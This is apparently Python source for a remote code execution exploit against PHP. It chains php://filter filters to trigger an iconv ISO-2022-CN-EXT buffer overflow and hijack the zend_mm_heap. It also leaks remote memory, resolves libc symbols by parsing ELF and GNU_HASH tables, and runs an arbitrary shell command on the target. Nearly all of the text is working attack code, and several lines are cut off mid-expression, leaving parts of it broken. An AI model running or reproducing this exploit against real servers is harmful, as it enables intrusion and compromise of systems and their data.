step4_custom_heap = ptr_bucket( ADDR_EMALLOC, ADDR_EFREE, ADDR_EREALLOC, size=0x18 ) step4_use_custom_heap_size = 0x140 COMMAND = self.command COMMAND = f"kill -9 $PPID; {COMMAND}" if self.sleep: COMMAND = f"sleep {self.sleep}; {COMMAND}" COMMAND = COMMAND.encode() + b"\x00" assert ( len(COMMAND) <= step4_use_custom_heap_size ), f"Command too big ({len(COMMAND)}), it must be strictly inferior to {hex(step4_use_custom_heap_size)}" COMMAND = COMMAND.ljust(step4_use_custom_heap_size, b"\x00") step4_use_custom_heap = COMMAND step4_use_custom_heap = qpe(step4_use_custom_heap) step4_use_custom_heap = self.russian_doll(step4_use_custom_heap, 0, 0, 0) pages = ( step4 * 3 + step4_pwn + step4_custom_heap + step4_use_custom_heap + step3_overflow + pad * 20 + step1 * 3 + step2_write_ptr + step2 * 2 ) resource = self._data_to_resource(pages) filters = [ # Create buckets "zlib.inflate", "zlib.inflate", # Step 0: Setup heap "dechunk", "convert.iconv.L1.L1", # Step 1: Reverse FL order "dechunk", "convert.iconv.L1.L1", # Step 2: Put fake pointer and make FL order back to normal "dechunk", "convert.iconv.L1.L1", # Step 3: Trigger overflow "dechunk", "convert.iconv.UTF-8.ISO-2022-CN-EXT", # Step 4: Allocate at arbitrary address and change zend_mm_heap "convert.quoted-printable-decode", "convert.iconv.L1.L1", ] filters = "|".join(filters) path = f"php://filter/read={filters}/resource={resource}" start = time.time() try: self.remote.oracle(path) except: self.logger.exception("The oracle raised an exception (although that could be normal)") msg_print() if not self.sleep: msg_print(Align.center("[b white on black] EXPLOIT [/][b white on green] SUCCESS [/] [i](probably)[/]")) elif start + self.sleep <= time.time(): msg_print(Align.center("[b white on black] EXPLOIT [/][b white on green] SUCCESS [/]")) else: msg_print(Align.center("[b white on black] EXPLOIT [/][b white on red] FAILURE [/]")) msg_print() @dataclass class LinkedBruteforcer(Bruteforcer): exploit: Exploit filters: list[str] resource: str HEADER = "" def __post_init__(self) -> None: super().__init__(0) self.logger = logger(self.__class__.__name__) @classmethod def compute_write(cls, filters: list[str]) -> str: """To make sure that the heap does not change too much, we add dummy filters so that PHP creates the associated structures. They do not impact our exploit, as they are write filters. However, they will be called when the stream is finally freed, at the end of the execution. We thus convert any funky charset to latin1, to make sure PHP does not report errors. This also makes sure that the length of the path is always the same. Although this is very helpful, this is not perfect. The order in which the filters are created matters as well. However, we cannot control this perfectly. """ filters = Counter(filters) missing = [] for filter, number in cls.FILTER_USAGE.items(): used = filters.get(filter, 0) if filter.startswith("convert.iconv."): _, _, ffrom, fto = filter.split(".") if len(ffrom) >= 2: ffrom = "L1".ljust(len(ffrom), " ") if len(fto) >= 2: fto = "L1".ljust(len(fto), " ") filter = f"convert.iconv.{ffrom}.{fto}" if used < number: missing += [filter] * (number - used) # assert (Counter(missing) + Counter(filters) == Counter(cls.FILTER_USAGE)) return "|".join(missing) def send(self, filters: str) -> bool: """Sends a filter chain with the given filters, and returns True if the expansion happened. """ filters = [filter for filter in filters.split("|") if filter] filters = self.filters + filters return self.exploit.oracle(filters, self.resource) def put(buffer: bytearray, position: int, data: bytes) -> None: if position < 0: position = len(buffer) + position buffer[position : position + len(data)] = data @dataclass class MemoryDumper: exploit: Exploit base: int log = logger("MemoryDumper") def dump(self, address: int, size: int, message: str = None) -> bytes: address += self.base self.log.debug(f"Dumping memory at {address:#x} for {size:#x} bytes") return self.exploit.dump_memory(address, size, message=message) def expect(self, address: int, expected: bytes) -> bool: address += self.base self.log.debug(f"Dumping memory at {address:#x} expecting {expected.hex()}") return self.exploit.expect_memory(address, expected) def unpack(self, address: int, format: str, message: str = None) -> tuple: data = self.dump(address, struct.calcsize(format), message=message) return struct.unpack(format, data) def offset(self, address: int) -> MemoryDumper: return MemoryDumper(self.exploit, self.base + address) @dataclass class ELFDumper(MemoryDumper): """Provides helpers to dump an ELF file from memory. """ # Program header types DT_NEEDED = 1 DT_DYNAMIC = 2 # Dynamic segment types DT = { "STRTAB": 0x05, "SYMTAB": 0x06, "JMPREL": 0x17, "GNU_HASH": 0x6FFFFEF5, } dynamic_section: MemoryDumper = field(init=False) segments: dict[str, MemoryDumper] = field(init=False, default_factory=dict) gnu_hash_info: dict[str, int] = field(init=False, default=None) def identify(self) -> None: self.expect(0, b"\x7fELF") self.expect(5, b"\x02") # x64 self.expect(6, b"\x01") # little endian def setup_gnu_hash(self) -> None: self.get_dynamic_section() self.get_dynamic_segments("STRTAB", "SYMTAB", "GNU_HASH") self.parse_gnu_hash() def find_some_libc_function(self) -> int: """Finds the address of a libc function in the JMPREL section. """ rela = self.segments["JMPREL"] symtab = self.segments["SYMTAB"] strtab = self.segments["STRTAB"] libc_functions = to_bytes(table.read("libc-functions.list")) # Go through the .rela.plt section looking for a function name that matches # one of the libc functions for i in track(range(0, 0x2000, 0x18), "Looking for a libc function in the [i]JMPREL[/] section"): # the 4 MSB of r_info are the index of the symbol in the symbol table r_info, = rela.unpack(i + 8 + 4, " int: """Go through .dynsym to find a symbol. Slow. """ name = name.encode() + b"\x00" symtab = self.segments["SYMTAB"] strtab = self.segments["STRTAB"] for symbol in itertools.count(0, 0x18): # We expect strtab to be of size 0xffffff or less, and thus only dump 3 # bytes. This reduces the time required to find the symbol. st_name = u32(symtab.dump(symbol, 3) + b"\x00") if strtab.expect(st_name, name): st_value, = symtab.unpack(symbol + 8, ' None: """Finds DT_DYNAMIC in the program headers and obtains its virtual offset.""" with msg_status("Parsing ELF header"): (e_phoff,) = self.unpack(0x20, " None: """Parses the GNU hash table to find the address of a symbol.""" # Read the GNU hash table header with msg_status("Dumping [i]GNU_HASH[/] header"): nbuckets, symndx, maskwords, shift2 = self.segments["GNU_HASH"].unpack(0, " None | NoReturn: """Looks for tags in the dynamic section. """ ds = self.dynamic_section # Iterate through the dynamic section, looking for specific entries # TODO We didn't dump the size, so we might iterate endlessly if an entry is not # found for element in track(range(0, ds.size, 0x10), "Looking for interesting dynamic segments"): # We cheat and only dump 1 byte instead of the 8 constituting the tag. (d_tag_lsb,) = ds.dump(element, 1) for entry in entries: if entry in self.segments: continue if d_tag_lsb == self.DT[entry] & 0xFF: break else: continue (d_val,) = ds.unpack(element + 8, " int: """Computes the bloom hash of the given symbol name.""" h = 5381 for c in name: h = (h << 5) + h + ord(c) return h & 0xFFFFFFFF def find_symbol_from_hash(self, name: str) -> int: """Finds the address of the given symbol name using the GNU_HASH section.""" gh = self.segments["GNU_HASH"] symtab = self.segments["SYMTAB"] strtab = self.segments["STRTAB"] with msg_status(f"Looking for address of [i]{name}[/] using [i]GNU_HASH[/]"): gnu_hash_info = self.gnu_hash_info nbuckets = gnu_hash_info["nbuckets"] symndx = gnu_hash_info["symndx"] hash_buckets_offset = gnu_hash_info["hash_buckets_offset"] hash_values_offset = gnu_hash_info["hash_values_offset"] # Compute the hash of the symbol name hash = self.compute_hash(name) bname = name.encode() + b"\x00" bucket = hash % nbuckets # Get the symbol index from the hash bucket sym_index_offset = hash_buckets_offset + (bucket * 4) (sym_index,) = gh.unpack(sym_index_offset, " bytes: """Returns compressed data, suitable for `zlib.inflate`.""" # NOTE This does not decompress properly in some cases. I don't know why. # Remove 2-byte header and 4-byte checksum # old = zlib.compress(data, 9)[2:-4] # print(len(old)) object = zlib.compressobj(level=9, wbits=-15, memLevel=9) new = object.compress(data) + object.flush() # print(len(new)) return new def b64(data: bytes, misalign=True) -> bytes: payload = base64.encode(data) if not misalign and payload.endswith("="): raise ValueError(f"Misaligned: {data}") return payload.encode() def compressed_bucket(data: bytes) -> bytes: """Returns a chunk of size 0x8000 that, when dechunked, returns the data.""" return chunked_chunk(data, 0x8000) def qpe(data: bytes) -> bytes: """Emulates quoted-printable-encode.""" return "".join(f"={x:02x}" for x in data).upper().encode() def chunked_chunk(data: bytes, size: int = None) -> bytes: """Constructs a chunked representation of the given chunk. If size is given, the chunked representation has size `size`. For instance, `ABCD` with size 10 becomes: `0004\nABCD\n`. """ # The caller does not care about the size: let's just add 8, which is more than # enough if size is None: size = len(data) + 8 keep = len(data) + len(b"\n\n") size = f"{len(data):x}".rjust(size - keep, "0") return size.encode() + b"\n" + data + b"\n" def option_help(name: str) -> str: """Returns a string that can be used to display the help for the given option.""" return f"[black]({name})[/]" def addr(address: int) -> str: return f"[magenta]{address:#x}[/]" class Filters: """A collection of filters used in the exploit.""" REV_2 = "convert.iconv.UTF-16LE.UTF-16BE" REV_4 = "convert.iconv.UCS-4LE.UCS-4" ADD3 = [ "convert.base64-encode", "convert.iconv.UTF8.CSISO2022KR", "convert.base64-decode", "convert.base64-encode", "convert.iconv.JS.UNICODE", "convert.iconv.L4.UCS2", "convert.base64-decode", "convert.base64-encode", "convert.iconv.UTF8.CSISO2022KR", "convert.base64-decode", "convert.base64-encode", "convert.iconv.UTF8.CSISO2022KR", "convert.base64-decode", ] DITCH_4 = ( ADD3 + [REV_4] + ADD3 + ["convert.base64-decode", "convert.base64-encode"] + [REV_2] ) REMOVE_EQUALS = [ "convert.iconv.L1.UTF7", "convert.base64-decode", "convert.base64-encode", ] QUARTET_DIGITS = [ [], # 1 [REV_2], # 2 [REV_4, REV_2], # 3 [REV_4], # 4 ] @staticmethod def base(mid: int) -> list: """Gets a list of base filters. `mid` indicates the number of times we dechunk into L1. """ return ( [ "zlib.inflate", "zlib.inflate", ] + [ "dechunk", "convert.iconv.L1.L1", ] * mid + [ "dechunk", "convert.iconv.UTF-8.ISO-2022-CN-EXT", ] ) def p64(value): """Pack a 64-bit integer into a byte string.""" return struct.pack(' int: """Converts an hex string to an integer.""" return int(value, 16) Exploit()